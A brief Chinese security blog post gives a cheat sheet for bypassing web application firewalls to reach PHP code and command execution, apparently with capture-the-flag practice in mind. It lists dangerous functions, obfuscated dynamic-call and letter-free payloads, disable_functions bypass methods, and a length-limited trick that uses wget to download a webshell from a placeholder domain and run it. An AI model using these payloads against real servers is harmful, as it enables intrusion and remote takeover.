[web安全]命令执行&&代码执行 wafpass总结

时间:2021-01-06 11:40:50   收藏:0   阅读:0

命令执行&&代码执行 wafpass总结

代码执行

  1. php常见命令执行函数

     php代码
     	eval()
     	assert()
     	preg_replace
     	call_user_func()
     	call_user_func_array()
     	create_function
     	array_map()
     系统命令代码
     	system()
     	passthru()
     	exec()
     	pcntl_exec()
    	shell_exec()
     	popen()
     	proc_open()
        ``
        ob_start()
    
  2. php的动态执行

    cmd=$_GET[func]($_GET[shell])&func=system&shell=cat flag
    $e=‘sys‘.‘tem‘;$e(‘cat flag‘);
    
  3. disable_function绕过

    1.ld_preload
    2.php_gc
    
  4. 无字母getshell

    取反~?code=(~%8f%97%8f%96%91%99%90)()//phpinfo()
    
  5. 限制输入字符数

    >wget\>域名.\>com\>-O\>she\>ll.p\>p
    ls -t>a
    sh a
    

命令执行

评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2  联系我们:gaon5@hotmail.com
迷上了代码!